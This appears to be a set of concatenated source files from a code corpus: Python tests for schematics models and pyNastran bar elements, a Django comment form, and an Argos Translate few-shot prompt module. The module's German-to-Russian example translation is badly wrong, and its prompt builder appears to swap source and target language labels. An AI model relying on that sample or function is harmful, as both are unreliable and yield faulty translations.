def test_simple_embedded_model_is_none_within_listtype():
class QuestionResources(Model):
type = StringType()
class Question(Model):
id = StringType()
resources = ModelType(QuestionResources)
class QuestionPack(Model):
id = StringType()
questions = ListType(ModelType(Question))
question_pack = QuestionPack({
"id": "1",
"questions": [
{
"id": "1",
},
]
})
assert question_pack.questions[0].resources is None
def test_raises_validation_error_on_init_with_partial_submodel():
class User(Model):
name = StringType(required=True)
age = IntType(required=True)
class Card(Model):
user = ModelType(User)
u = User({'name': 'Arthur'})
c = Card({'user': u})
with pytest.raises(DataError):
c.validate()
def test_model_type():
class User(Model):
name = StringType()
class Card(Model):
user = ModelType(User)
c = Card({"user": {'name': u'Doggy'}})
assert isinstance(c.user, User)
assert c.user.name == "Doggy"
def test_equality_with_embedded_models():
class Location(Model):
country_code = StringType()
class Player(Model):
id = IntType()
location = ModelType(Location)
p1 = Player(dict(id=1, location={"country_code": "US"}))
p2 = Player(dict(id=1, location={"country_code": "US"}))
assert id(p1.location) != id(p2.location)
assert p1.location == p2.location
assert p1 == p2
def test_default_value_when_embedded_model():
class Question(Model):
question_id = StringType(required=True)
type = StringType(default="text")
class QuestionPack(Model):
question = ModelType(Question)
pack = QuestionPack({
"question": {
"question_id": 1
}
})
assert pack.question.question_id == "1"
assert pack.question.type == "text"
def test_export_loop_with_subclassed_model():
class Asset(Model):
file_name = StringType()
class S3Asset(Asset):
bucket_name = StringType()
class Product(Model):
title = StringType()
asset = ModelType(Asset)
asset = S3Asset({'bucket_name': 'assets_bucket', 'file_name': 'bar'})
product = Product({'title': 'baz', 'asset': asset})
primitive = product.to_primitive()
assert 'bucket_name' in primitive['asset']
native = product.to_native()
assert 'bucket_name' in native['asset']
def test_conversion_error_recursive_overhead():
conversions = [0]
class Leaf(Model):
pass
next_model = Leaf
data = 'not a mapping'
for i in range(20):
class Recursive(Model):
x = ModelType(next_model, required=True)
def __init__(self, *args, **kwargs):
super(type(self), self).__init__(*args, **kwargs)
conversions[0] += 1
assert conversions[0] < 25
next_model = Recursive
data = {'x': data}
with pytest.raises(DataError):
next_model(data)
def test_mock_object():
class User(Model):
name = StringType(required=True)
age = IntType(required=True)
assert ModelType(User, required=True).mock() is not None
def test_specify_model_by_name():
class M(Model):
to_one = ModelType('M')
to_many = ListType(ModelType('M'))
matrix = ListType(ListType(ModelType('M')))
assert M.to_one.model_class is M
assert M.to_many.field.model_class is M
assert M.matrix.field.field.model_class is M
def test_model_context_pass_to_type():
from schematics.types import BaseType
from schematics.datastructures import Context
class CustomType(BaseType):
def to_native(self, value, context=None):
suffix = context.suffix
return str(value) + suffix
def to_primitive(self, value, context=None):
suffix = context.suffix
return value[:-len(suffix)]
class Thing(Model):
x = CustomType()
context = {'suffix': 'z'}
input = {'x': 'thingie'}
thing = Thing(input, context=context)
assert thing.x == 'thingiez'
assert thing.to_primitive(context=context) == {'x': 'thingie'}
# try it with a Context object
model_context = Context(suffix='z!')
thing2 = Thing(input, context=model_context)
assert thing2.x == 'thingiez!'
export_context = Context(suffix='z!')
assert thing2.to_primitive(context=export_context) == {'x': 'thingie'}
with pytest.raises(AttributeError):
# can't reuse the same Context object as was used for model
# TODO this may be unexpected to the uninitiated; a custom exception
# could explain it better.
thing2.to_primitive(context=model_context)
def test_model_app_data_pass_to_type():
from schematics.types import BaseType
class CustomType(BaseType):
def to_native(self, value, context=None):
suffix = context.app_data['suffix']
return str(value) + suffix
def to_primitive(self, value, context=None):
suffix = context.app_data['suffix']
return value[:-len(suffix)]
class Thing(Model):
x = CustomType()
app_data = {'suffix': 'z'}
input = {'x': 'thingie'}
thing = Thing(input, app_data=app_data)
assert thing.x == 'thingiez'
assert thing.to_primitive(app_data=app_data) == {'x': 'thingie'}
class OuterModel:
class InnerModel(Model):
test = StringType()
def test_deep_string_search():
class TestModel(Model):
deep_model = ModelType('test_model_type.OuterModel.InnerModel')
test = TestModel(dict(deep_model=dict(test='Abc')))
assert test.validate() is None
class TestModel2(Model):
invalid_model = ModelType('a.c.d.e')
with pytest.raises(ImportStringError):
TestModel2(dict(invalid_model=dict(a='1')))
def test_recursive_string_self_reference():
class RecursiveTestModel(Model):
recursive_model = ModelType('RecursiveTestModel')
test = StringType()
test = RecursiveTestModel(dict(recursive_model=dict(test='Abc')))
assert test.validate() is None
assert test.recursive_model.test == 'Abc'
def test_circular_string_reference():
class TestModel1(Model):
model2 = ModelType('TestModel2')
name = StringType()
class TestModel2(Model):
model1 = ModelType('TestModel1')
description = StringType()
data1 = {'name': 'Test1'}
data2 = {'description': 'Test2', 'model1': data1}
# TODO: we might want to support locals import late binding someday/somehow
with pytest.raises(ImportStringError):
test = TestModel1({
'name': 'Root',
'model2': data2
})
|
pyNastran/bdf/cards/test/test_bars.py
|
ACea15/pyNastran
| 293 |
101140
|
import os
import unittest
import numpy as np
from pyNastran.bdf.bdf import BDF, BDFCard, CBAR, PBAR, PBARL, GRID, MAT1
from pyNastran.bdf.field_writer_8 import print_card_8
from pyNastran.bdf.mesh_utils.mass_properties import (
mass_properties, mass_properties_nsm) #mass_properties_breakdown
from pyNastran.bdf.cards.test.utils import save_load_deck
from pyNastran.bdf.mesh_utils.loads import sum_forces_moments, sum_forces_moments_elements
class TestBars(unittest.TestCase):
"""test CBAR/PBAR/PBARL classes"""
def test_pbar_1(self):
"""tests the PBAR BDF add"""
area = 0.0
i11 = 4.9e-2
i22 = 5.5e-2
i12 = 6.6e-2
j = 7.7e-2
nsm = 1.0
fields = [
u'PBAR', 1510998, 1520998, area, i11,
i22, j, nsm, None, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, None, None, i12,
]
card = print_card_8(fields)
#print(card)
card = print_card_8(fields)
lines = card.split('\n')
model = BDF(debug=False)
card = model._process_card(lines)
cardi = BDFCard(card)
pbar = PBAR.add_card(cardi)
pbar.raw_fields()
self.assertEqual(pbar.A, area)
self.assertEqual(pbar.i1, i11)
self.assertEqual(pbar.i2, i22)
self.assertEqual(pbar.i12, i12)
self.assertEqual(pbar.j, j)
self.assertEqual(pbar.k1, None)
self.assertEqual(pbar.k2, None)
self.assertEqual(pbar.nsm, nsm)
assert np.allclose(pbar.Area(), area)
assert np.allclose(pbar.I11(), i11)
assert np.allclose(pbar.I22(), i22)
assert np.allclose(pbar.I12(), i12)
assert np.allclose(pbar.J(), j)
assert np.allclose(pbar.Nsm(), nsm)
def test_pbar_2(self):
"""tests the PBAR BDF add"""
pid = 1
mid = 2
A = None
I1 = I2 = None
J = None
nsm = None
c1 = c2 = d1 = d2 = e1 = e2 = f1 = f2 = None
k1 = k2 = None
i12 = 3.
fields = [
'PBAR', pid, mid, A, I1, I2, J, nsm, None,
c1, c2, d1, d2, e1, e2, f1, f2,
k1, k2, i12
]
card = print_card_8(fields)
lines = card.split('\n')
model = BDF(debug=False)
card = model._process_card(lines)
cardi = BDFCard(card)
pbar = PBAR.add_card(cardi)
self.assertEqual(pbar.pid, 1)
self.assertEqual(pbar.mid, 2)
self.assertEqual(pbar.A, 0.0)
self.assertEqual(pbar.i1, 0.0)
self.assertEqual(pbar.i2, 0.0)
self.assertEqual(pbar.j, 0.0)
self.assertEqual(pbar.nsm, 0.0)
self.assertEqual(pbar.i12, 3.0)
self.assertEqual(pbar.c1, 0.0)
self.assertEqual(pbar.c2, 0.0)
self.assertEqual(pbar.d1, 0.0)
self.assertEqual(pbar.d2, 0.0)
self.assertEqual(pbar.e1, 0.0)
self.assertEqual(pbar.e2, 0.0)
self.assertEqual(pbar.k1, None)
self.assertEqual(pbar.k2, None)
#--------------------------------------------------------
A = 6.
I1 = 5.
I2 = 4.
J = 3.
nsm = 2.
c1 = c2 = d1 = d2 = e1 = e2 = f1 = f2 = None
k1 = k2 = 1e2
i12 = 0.
fields = [
'PBAR', pid, mid, A, I1, I2, J, nsm, None,
c1, c2, d1, d2, e1, e2, f1, f2,
k1, k2, i12]
card = print_card_8(fields)
lines = card.split('\n')
model = BDF(debug=False)
card = model._process_card(lines)
cardi = BDFCard(card)
pbar = PBAR.add_card(cardi)
self.assertEqual(pbar.pid, 1)
self.assertEqual(pbar.mid, 2)
self.assertEqual(pbar.A, 6.0)
self.assertEqual(pbar.i1, 5.0)
self.assertEqual(pbar.i2, 4.0)
self.assertEqual(pbar.j, 3.0)
self.assertEqual(pbar.nsm, 2.0)
self.assertEqual(pbar.i12, 0.0)
self.assertEqual(pbar.c1, 0.0)
self.assertEqual(pbar.c2, 0.0)
self.assertEqual(pbar.d1, 0.0)
self.assertEqual(pbar.d2, 0.0)
self.assertEqual(pbar.e1, 0.0)
self.assertEqual(pbar.e2, 0.0)
self.assertEqual(pbar.k1, 1e2)
self.assertEqual(pbar.k2, 1e2)
def test_pbar_3(self):
"""tests the PBAR validate"""
pid = 42
mid = 10
i1 = -1.
i2 = -2.
i12 = -3.
j = -4.
pbar = PBAR(pid, mid, A=0., i1=i1, i2=i2, i12=i12, j=j, nsm=0., c1=0., c2=0.,
d1=0., d2=0., e1=0., e2=0., f1=0., f2=0., k1=1.e8,
k2=1.e8, comment='pbar')
with self.assertRaises(ValueError):
pbar.validate()
pbar.i1 = 1.
with self.assertRaises(ValueError):
pbar.validate()
pbar.i2 = 2.
with self.assertRaises(ValueError):
pbar.validate()
pbar.j = 4.
pbar.validate()
model = BDF(debug=False)
pbar = model.add_pbar(pid, mid, A=0., i1=2., i2=2., i12=1., j=4., nsm=0., c1=0., c2=0.,
d1=0., d2=0., e1=0., e2=0., f1=0., f2=0., k1=1.e8,
k2=1.e8, comment='pbar')
pbar.validate()
nids = [100, 101]
eid = 1000
x = [0., 0., 1.]
g0 = None
model.add_cbar(eid, pid, nids, x, g0, comment='cbar')
model.add_grid(100, [0., 0., 0.])
model.add_grid(101, [1., 0., 0.])
E = 3.0e7
G = None
nu = 0.3
model.add_mat1(mid, E, G, nu)
save_load_deck(model)
def test_cbar_g0(self):
"""modification of test_cbeam_01"""
model = BDF(debug=False)
pid = 200
mid = 6
model.add_pbar(pid, mid, A=0., i1=2., i2=2., i12=1., j=4., nsm=0., c1=0., c2=0.,
d1=0., d2=0., e1=0., e2=0., f1=0., f2=0., k1=1.e8,
k2=1.e8, comment='pbar')
eid = 100
nids = [10, 20]
x = None
g0 = 30
cbar = model.add_cbar(eid, pid, nids, x, g0, comment='cbar')
cbar.write_card_16(is_double=False)
E = 1.0e7
G = None
nu = 0.3
model.add_mat1(mid, E, G, nu)
model.add_grid(10, [0., 0., 0.])
model.add_grid(20, [0., 1., 0.])
model.add_grid(30, [0., 2., 0.])
model.cross_reference()
save_load_deck(model)
def test_pbarl_1(self):
"""tests the PBARL"""
model = BDF(log=None, debug=False)
pid = 4
mid = 40
group = 'group'
Type = 'bad_type'
dim = 42
nsm = 0.5
pbarl = PBARL(pid, mid, Type, dim, group=group, nsm=nsm, comment='comment')
with self.assertRaises(ValueError): # Type
pbarl.validate()
pbarl.Type = 'TUBE'
with self.assertRaises(TypeError): # dim
pbarl.validate()
pbarl.dim = [20.]
with self.assertRaises(RuntimeError):
pbarl.validate()
pbarl.dim = [2., 1.]
#with self.assertRaises(ValueError):
#pbarl.validate()
#pbarl.group = 'MSCBML0'
pbarl.validate()
str(pbarl)
pbarl.write_card(size=8, is_double=False)
pbarl.write_card(size=16, is_double=False)
pbarl.write_card(size=16, is_double=True)
model.properties[pid] = pbarl
nid1 = 52
xyz1 = [0., 0., 0.]
model.nodes[nid1] = GRID(nid1, cp=0, xyz=xyz1)
nid2 = 53
xyz2 = [1., 0., 0.]
model.nodes[nid2] = GRID(nid2, cp=0, xyz=xyz2)
E = 30.0e7
G = None
nu = 0.3
mat = MAT1(mid, E, G, nu, rho=1.0)
model.materials[mid] = mat
eid = 42
x = None
g0 = None
cbar = CBAR(eid, pid, [nid1, nid2], x, g0, offt='GGG',
pa=0, pb=0, wa=None, wb=None, comment='')
with self.assertRaises(ValueError):
cbar.validate()
cbar.x = [0., 1., 2.]
cbar.validate()
model.elements[eid] = cbar
pbarl._verify(xref=False)
model.validate()
model.cross_reference()
pbarl._verify(xref=True)
assert np.allclose(cbar.Mass(), 9.9247779608), cbar.Mass()
mat.rho = 0.
assert np.allclose(cbar.Mass(), 0.5), cbar.Mass()
scale = 'FR'
x = [0.2, 0.4, 0.6, 0.8]
model.add_cbarao(eid, scale, x, comment='cbarao')
model.add_card(['CBARAO', eid+1, 'RF', 6, 0.1, 0.2], 'CBARAO')
save_load_deck(model, run_quality=False, run_test_bdf=False)
def test_bar_mass_1(self):
"""tests CBAR/PBAR mass"""
model = BDF(debug=False)
#model.case_control_deck = CaseControlDeck(case_control_lines)
spc = ['SPC1', 123456, 123456, 1]
grid1 = ['GRID', 1, None, 0., 0., 0.]
grid2 = ['GRID', 2, None, 1., 0., 0.]
#grid3 = ['GRID', 3, None, 1., 0., 0.]
force = ['FORCE', 100, 1, 0, 2., 3., 4.]
pid = 11
mid = 12
cbar = [
'CBAR', 10, pid, 1, 2, 0., 1., 0., None,
]
k1 = k2 = None
area = 2.0
rho = 3.
nu = 0.3
i1 = 2.1
i2 = 1.2
i12 = 0.1
j = None
nsm = 0.1
pbar = [
'PBAR', pid, mid, area, i1, i2, j, nsm,
None, None, None, None, None, None, None, None,
k1, k2, i12
]
mat1 = ['MAT1', mid, 3.0e7, None, nu, rho]
model.add_card(grid1, 'GRID')
model.add_card(grid2, 'GRID')
model.add_card(cbar, 'CBAR')
model.add_card(pbar, 'PBAR')
model.add_card(mat1, 'MAT1')
model.add_card(spc, 'SPC1')
model.add_card(force, 'FORCE')
model.validate()
model.cross_reference()
mass, unused_cg, unused_I = mass_properties(
model,
element_ids=None, mass_ids=None,
reference_point=None,
sym_axis=None,
scale=None)
#print('cg* =', cg)
L = 1.0
mass_per_length = area * rho + nsm
mass = L * mass_per_length
#xcg = (0.0 * mass_a + 1.0 * mass_b) / (mass_a + mass_b)
#print(mass_a, mass_b, xcg, mass_a + mass_b)
#print('mass =', mass)
#cbar = CBEAM()
cbar = model.elements[10]
pbar = model.properties[11]
assert pbar.Nu() == nu, 'pbar.Nu()=%s nu=%s' % (pbar.Nu(), nu)
assert pbar.Rho() == rho, 'pbar.Rho()=%s rho=%s' % (pbar.Rho(), rho)
assert np.allclose(cbar.Length(), 1.0), cbar.Length()
#assert np.allclose(cbar.Mass(), 10.25), cbar.Mass()
#assert np.allclose(cbar.MassPerLength(), 10.25), cbar.MassPerLength()
#assert np.allclose(mass, 10.25), mass
case_control_lines = (
'SOL 101\n'
'CEND\n'
'SUBCASE 1\n'
' STRESS(PLOT,SORT1,REAL) = ALL\n'
' SPC = 123456\n'
' LOAD = 100\n'
'BEGIN BULK\n'
'PARAM,GRDPNT,0\n'
'PARAM,POST,-1\n'
'PARAM POSTEXT YES\n'
)
with open('cbar.bdf', 'w') as bdf_file:
bdf_file.write(case_control_lines)
model.write_bdf(bdf_file, enddata=True)
model2 = BDF(debug=False)
model2.read_bdf('cbar.bdf')
model2._verify_bdf(xref=True)
if not os.path.exists('cbar.op2') and 0:
os.system('nastran scr=yes bat=no old=no cbar.bdf')
os.remove('cbar.bdf')
if 0: # pragma: no cover
from pyNastran.op2.op2 import OP2
op2 = OP2()
op2.read_op2('cbar.op2')
#os.remove('cbar.op2')
gpw = op2.grid_point_weight
op2_mass = gpw.mass.max()
assert np.allclose(op2_mass, mass), 'op2_mass=%s mass=%s' % (op2_mass, mass)
#print('op2_mass=%s mass=%s' % (op2_mass, mass))
unused_op2_cg = gpw.cg
unused_cg = np.array([0.5, 0., 0.], dtype='float32')
#print('cg =', op2_cg)
def test_bar_mass_2(self):
"""CBAR/PBARL"""
model = BDF(debug=False)
model.add_grid(1, [0., 0., 0.])
model.add_grid(2, [1., 0., 0.])
model.add_grid(3, [0., 1., 0.])
mid = 1
E = 3.0e7
G = None
nu = 0.3
model.add_mat1(mid, E, G, nu, rho=1.)
#---------------------------------------------------------------
eid = 1
pid = 101
nids = [1, 2]
x = [0., 0., 1.]
g0 = None
unused_cbar = model.add_cbar(eid, pid, nids, x, g0, offt='GGG',
pa=0, pb=0, wa=None, wb=None,
comment='CBAR')
Type = 'BOX'
dim = [1., 2., 0.1, 0.1]
#pbeaml = model.add_pbeaml(pid, mid, Type, xxb, dims, nsm=None,
#so=None, comment='PBEAML')
unused_pbarl = model.add_pbarl(pid, mid, Type, dim, group='MSCBML0', nsm=0.,
comment='PBARL')
#---------------------------------------------------------------
eid = 2
pid = 102
x = None
g0 = 3
unused_cbar = model.add_cbar(eid, pid, nids, x, g0, offt='GGG',
pa=0, pb=0, wa=None, wb=None,
comment='CBAR')
Type = 'BOX'
dim = [1., 2., 0.1, 0.1]
unused_pbarl = model.add_pbarl(pid, mid, Type, dim, group='MSCBML0', nsm=0.,
comment='PBARL')
#---------------------------------------------------------------
eid = 3
pid = 103
#cbar = model.add_cbar(eid, pid, nids, x, g0, offt='GGG',
#pa=42, pb=5, wa=None, wb=None,
#comment='CBAR')
unused_pbar = model.add_pbar(pid, mid, A=1., i1=0., i2=0., i12=0., j=0., nsm=0.1,
c1=0., c2=0.,
d1=0., d2=0.,
e1=0., e2=0.,
f1=0., f2=0.,
k1=1.e8, k2=1.e8,
comment='pbar')
#G = 3.0e7
#E = None
#nu = 0.3
#model.add_mat1(mid, E, G, nu, rho=0.0, a=0.0, tref=0.0, ge=0.0,
#St=0.0, Sc=0.0, Ss=0.0, mcsid=0,
#comment='')
#---------------------------------------------------------------
model.validate()
model.pop_parse_errors()
model._verify_bdf(xref=False)
model.cross_reference()
model.pop_xref_errors()
model._verify_bdf(xref=True)
model.uncross_reference()
def test_pbar_nsm(self):
model = BDF(debug=False)
pid = 1
mid = 1
nsm = 1.
area = 2.0
pbar = model.add_pbar(pid, mid, A=area, i1=0., i2=0., i12=0., j=0.,
nsm=nsm,
c1=0., c2=0., d1=0., d2=0.,
e1=0., e2=0., f1=0., f2=0.,
k1=1.e8, k2=1.e8,
comment='')
E = 1.0
G = None
nu = 0.3
mat1 = model.add_mat1(mid, E, G, nu)
#----------------
card_lines = [
'PBAR 2 1 2. 1.',
]
model.add_card(card_lines, 'PBAR', comment='', is_list=False,
has_none=True)
pbar2 = model.properties[2]
#------------------
model.cross_reference()
assert pbar.Nsm() == 1.0
assert pbar.Area() == 2.0
# mass/L = area*rho + nsm
assert pbar.MassPerLength() == 1.0
# area = 2.0
mat1.rho = 10.0
assert pbar.MassPerLength() == 21.0, pbar.MassPerLength()
assert pbar2.MassPerLength() == 21.0, pbar2.MassPerLength()
def test_pbarl_nsm(self):
model = BDF(debug=False)
pid = 1
mid = 1
bar_type = 'BAR'
dim = [1., 2.] # area = 2.0
pbarl = model.add_pbarl(pid, mid, bar_type, dim, group='MSCBML0', nsm=1.,
comment='')
E = 1.0
G = None
nu = 0.3
mat1 = model.add_mat1(mid, E, G, nu)
#----------------
card_lines = [
'PBARL 2 1 BAR',
' 1.0 2.0 1.0',
]
model.add_card(card_lines, 'PBARL', comment='', is_list=False,
has_none=True)
pbarl2 = model.properties[2]
#------------------
model.cross_reference()
assert pbarl.Nsm() == 1.0
assert pbarl.Area() == 2.0
# mass/L = area*rho + nsm
assert pbarl.MassPerLength() == 1.0
# area = 2.0
mat1.rho = 10.0
assert pbarl.MassPerLength() == 21.0, pbarl.MassPerLength()
assert pbarl2.MassPerLength() == 21.0, pbarl2.MassPerLength()
loadcase_id = 10
eid = 11
load_type = 'FZ'
x1 = 0.
x2 = None
p1 = 10.
scale = 'FR'
model.add_pload1(loadcase_id, eid, load_type, scale, x1, p1,
x2=x2, p2=None, comment='pload1')
scale = 'LE'
model.add_pload1(loadcase_id, eid, load_type, scale, x1, p1,
x2=x2, p2=None, comment='')
model.add_grid(1, [0., 0., 0.])
model.add_grid(2, [1., 0., 0.])
model.add_grid(3, [0., 1., 0.])
x = None
g0 = 3
model.add_cbar(eid, pid, [1, 2], x, g0)
model.cross_reference()
p0 = 1
eids = None
nids = None
force1, moment1 = sum_forces_moments(model, p0, loadcase_id,
include_grav=False, xyz_cid0=None)
force2, moment2 = sum_forces_moments_elements(model, p0, loadcase_id, eids, nids,
include_grav=False, xyz_cid0=None)
#print(force1, force2)
assert np.allclose(force1, force2), force1
assert np.allclose(moment1, moment2), moment1
save_load_deck(model, xref='standard', punch=True)
def test_baror(self):
"""tests a BAROR"""
model = BDF(debug=False)
n1 = 10
n2 = 20
model.add_grid(n1, [0., 0., 0.])
model.add_grid(n2, [1., 0., 0.])
pid = 2
mid = 1
bar_type = 'BAR'
dim = [1., 2.] # area = 2.0
unused_pbarl = model.add_pbarl(pid, mid, bar_type, dim, group='MSCBML0', nsm=1.,
comment='')
E = 3.0e7
G = None
nu = 0.3
model.add_mat1(mid, E, G, nu, rho=1.)
card_lines = ['BAROR', None, pid, None, None, 0.6, 2.9, -5.87, 'GOG']
model.add_card(card_lines, 'BAROR', comment='BAROR', is_list=True,
has_none=True)
eid = 1
card_lines = ['CBAR', eid, pid, n1, n2]
model.add_card(card_lines, 'CBAR', comment='', is_list=True, has_none=True)
model.pop_parse_errors()
save_load_deck(model)
def test_baror_2(self):
model = BDF(debug=False)
pid = 12
is_g0 = True
g0 = 42
x = None
baror = model.add_baror(pid, is_g0, g0, x, offt='GGG', comment='baror')
baror.raw_fields()
baror.write_card(size=8)
baror.write_card(size=16)
save_load_deck(model)
def test_cbend(self):
"""tests a CBEND"""
model = BDF(debug=False)
eid = 7
pid = 10
nids = [2, 3]
g0 = 5
x = None
geom = 1
cbend = model.add_cbend(eid, pid, nids, g0, x, geom, comment='cbend')
model.add_grid(2, [0., 0., 0.])
model.add_grid(3, [0., 0., 0.])
model.add_grid(5, [0., 0., 0.])
#pbend = model.add_pbend(pid, mid, beam_type, A, i1, i2, j,
#c1, c2, d1, d2, e1, e2, f1, f2,
#k1, k2, nsm, rc, zc, delta_n, fsi,
#rm, t, p, rb, theta_b, comment='')
cbend.validate()
cbend.raw_fields()
cbend.write_card()
cbend.write_card(size=16)
model.validate()
model._verify_bdf(xref=False)
model.pop_parse_errors()
#model.cross_reference()
#model.pop_xref_errors()
#model._verify_bdf(xref=True)
#model.uncross_reference()
def test_cbeam3(self):
"""tests a CBEAM3"""
model = BDF(debug=False)
model.add_grid(1, [0., 0., 0.])
model.add_grid(2, [0., 0., 0.])
model.add_grid(3, [0., 0., 0.])
model.add_grid(4, [0., 0., 0.])
eid = 1
pid = 2
nids = [1, 2, 3]
x = None
g0 = 4
cbeam3 = model.add_cbeam3(eid, pid, nids, x, g0, wa=None, wb=None, wc=None, tw=None, s=None, comment='cbeam3')
cbeam3.raw_fields()
A = 1.
iz = 2.
iy = 3.
mid = 4
pbeam3 = model.add_pbeam3(pid, mid, A, iz, iy, iyz=0., j=None,
nsm=0., cy=0., cz=0., dy=0., dz=0., ey=0., ez=0., fy=0., fz=0., comment='')
E = 3.0e7
G = None
nu = 0.3
model.add_mat1(mid, E, G, nu, rho=0.1)
str(cbeam3)
pbeam3s = str(pbeam3)
#print(pbeam3s)
str(pbeam3s)
card_lines = pbeam3s.split('\n')
cbeam3._verify(xref=False)
model.cross_reference()
model.uncross_reference()
del model.properties[pid]
model.cards_to_read.add('PBEAM3')
model.add_card(card_lines, 'PBEAM3', comment='', ifile=None, is_list=False, has_none=True)
model.pop_parse_errors()
model.pop_xref_errors()
assert pbeam3 == model.properties[pid]
def test_bar_area(self):
"""tests the PBARL"""
model = BDF(log=None, debug=False)
mid = 40
group = 'group'
nsm = 0.0
shape_dims_area = [
# name, dims, area, i1
('ROD', [2.], 4. * np.pi, 0.),
('TUBE', [5., 1.], 24. * np.pi, 0.),
('BAR', [2., 3.], 6., 0.),
('BOX', [2., 3., 0.5, 0.5], 4., 0.),
('L', [2., 3., 1., 1.], 4., 0.),
('CHAN', [10., 10., 1., 1.], 28., None),
('CHAN1', [9., 0.1, 8., 10.], 19., None),
('CHAN2', [1, 1., 9., 10.], 26., None),
# new
('I', [1., 1., 1., 0.1, 0.1, 0.1], 0.28, None),
('I1', [0.1, 1., 0.5, 1.], 1.05, None),
('H', [1.0, 0.1, 1.0, 0.1], 0.2, None),
('Z', [0.5, 0.5, 0.5, 1.], 0.75, None),
('Z', [0.8, 0.5, 0.5, 1.], 0.90, None),
('Z', [0.5, 0.8, 0.5, 1.], 1.05, None),
('Z', [0.5, 0.5, 0.8, 1.], 0.60, None),
('Z', [0.5, 0.5, 0.5, 2.], 1.75, None),
('CHAN', [1., 1., 0.1, 0.1], 0.28, None),
('CHAN1', [0.5, 0.5, 0.5, 1.], 0.75, None),
('CHAN2', [0.1, 0.1, 1., 1.], 0.28, None),
('CROSS', [0.1, 0.1, 1., 0.1], 0.11, None),
('HEXA', [0.1, 1., 1.], 0.90, None),
('HEXA', [0.2, 1., 1.], 0.80, None),
('HEXA', [0.1, 2., 1.], 1.90, None),
('HEXA', [0.1, 1., 2.], 1.80, None),
('HAT', [1., 0.1, 1., 0.1], 0.30, None),
('HAT', [2., 0.1, 1., 0.1], 0.50, None),
('HAT', [1., 0.2, 1., 0.1], 0.56, None),
('HAT', [1., 0.1, 2., 0.1], 0.40, None),
('HAT', [1., 0.1, 1., 0.2], 0.32, None),
('HAT1', [3., 1., 1., 0.1, 0.1], 0.76, None),
('HAT1', [3., 2., 1., 0.1, 0.1], 0.96, None),
('HAT1', [3., 1., 2., 0.1, 0.1], 0.76, None),
('HAT1', [3., 1., 1., 0.2, 0.1], 1.18, None),
('HAT1', [3., 1., 1., 0.1, 0.2], 1.04, None),
('T', [10., 10., 3., 0.5], 33.5, None),
('T2', [10., 5., 0.5, 2.0], 14., None), # ball,hall,tflange,tweb
('T', [1., 1., 0.1, 0.1], 0.19, None),
('T1', [1., 1., 0.1, 0.1], 0.20, None),
('T2', [1., 1., 0.1, 0.1], 0.19, None),
('DBOX', [2., 1., 1., 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, ], 0.64, None),
('DBOX', [2., 2., 1., 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, ], 0.94, None),
('DBOX', [2., 1., 2., 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, ], 0.64, None),
('DBOX', [2., 1., 1., 0.2, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, ], 0.72, None),
('DBOX', [2., 1., 1., 0.1, 0.2, 0.1, 0.1, 0.1, 0.1, 0.1, ], 0.72, None),
('DBOX', [2., 1., 1., 0.1, 0.1, 0.2, 0.1, 0.1, 0.1, 0.1, ], 0.72, None),
('DBOX', [2., 1., 1., 0.1, 0.1, 0.1, 0.2, 0.1, 0.1, 0.1, ], 0.725, None),
('DBOX', [2., 1., 1., 0.1, 0.1, 0.1, 0.1, 0.2, 0.1, 0.1, ], 0.725, None),
('DBOX', [2., 1., 1., 0.1, 0.1, 0.1, 0.1, 0.1, 0.2, 0.1, ], 0.725, None),
('DBOX', [2., 1., 1., 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.2, ], 0.725, None),
]
pid = 1
for bar_type, dims, areai, i1 in shape_dims_area:
pbarl = PBARL(pid, mid, bar_type, dims, group=group, nsm=nsm, comment='comment')
pbarl.validate()
area2 = pbarl.Area()
if i1 is not None:
pbarl.I1()
pbarl.I2()
pbarl.I12()
assert np.allclose(areai, area2), 'bar_type=%r dims=%s area=%s area_expected=%s' % (bar_type, dims, area2, areai)
pid += 1
if __name__ == '__main__': # pragma: no cover
unittest.main()
|
airmozilla/comments/forms.py
|
RAMilewski/airmozilla
| 115 |
101146
|
<filename>airmozilla/comments/forms.py
from django import forms
from airmozilla.base.forms import BaseForm
from airmozilla.comments.models import Comment
class CommentForm(BaseForm):
name = forms.CharField(required=False)
comment = forms.CharField(widget=forms.Textarea)
reply_to = forms.IntegerField(required=False)
def clean_reply_to(self):
value = self.cleaned_data['reply_to']
if value:
try:
value = Comment.objects.get(pk=value)
except Comment.DoesNotExist:
raise forms.ValidationError('Invalid reply_to')
return value
|
argostranslate/fewshot.py
|
argosopentechnologies/Argos-Translate
| 1,114 |
101151
|
prompt = """Translate to French (fr)
From English (en)
==========
Bramshott is a village with mediaeval origins in the East Hampshire district of Hampshire, England. It lies 0.9 miles (1.4 km) north of Liphook. The nearest railway station, Liphook, is 1.3 miles (2.1 km) south of the village.
----------
Bramshott est un village avec des origines médiévales dans le quartier East Hampshire de Hampshire, en Angleterre. Il se trouve à 0,9 miles (1,4 km) au nord de Liphook. La gare la plus proche, Liphook, est à 1,3 km (2,1 km) au sud du village.
==========
Translate to Russian (ru)
From German (de)
==========
Der Gewöhnliche Strandhafer (Ammophila arenaria (L.) Link; Syn: Calamagrostis arenaria (L.) Roth) – auch als Gemeiner Strandhafer, Sandrohr, Sandhalm, Seehafer oder Helm (niederdeutsch) bezeichnet – ist eine zur Familie der Süßgräser (Poaceae) gehörige Pionierpflanze.
----------
Обычная пляжная овсянка (аммофила ареалия (л.) соединение; сина: каламагростисная анария (л.) Рот, также называемая обычной пляжной овцой, песчаной, сандалмой, морской орой или шлемом (нижний немецкий) - это кукольная станция, принадлежащая семье сладких трав (поа).
==========
"""
def generate_prompt(text, from_name, from_code, to_name, to_code):
    """Append a translation request for `text` to the few-shot examples in `prompt` and return the combined string."""
to_return = prompt
to_return += "Translate to "
if from_name:
to_return += from_name
if from_code:
to_return += " (" + from_code + ")"
to_return += "\nFrom "
if to_name:
to_return += to_name
    if to_code:
to_return += " (" + to_code + ")"
to_return += "\n" + "=" * 10 + "\n"
to_return += text
to_return += "\n" + "-" * 10 + "\n"
return to_return
def parse_inference(output):
end_index = output.find("=" * 10)
if end_index != -1:
        return output[:end_index]  # keep only the text before the marker
end_index = output.find("-" * 10)
if end_index != -1:
        return output[:end_index]  # keep only the text before the marker
return output
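# Illustrative flow (not in the original module); `translate_fn` stands in for whatever
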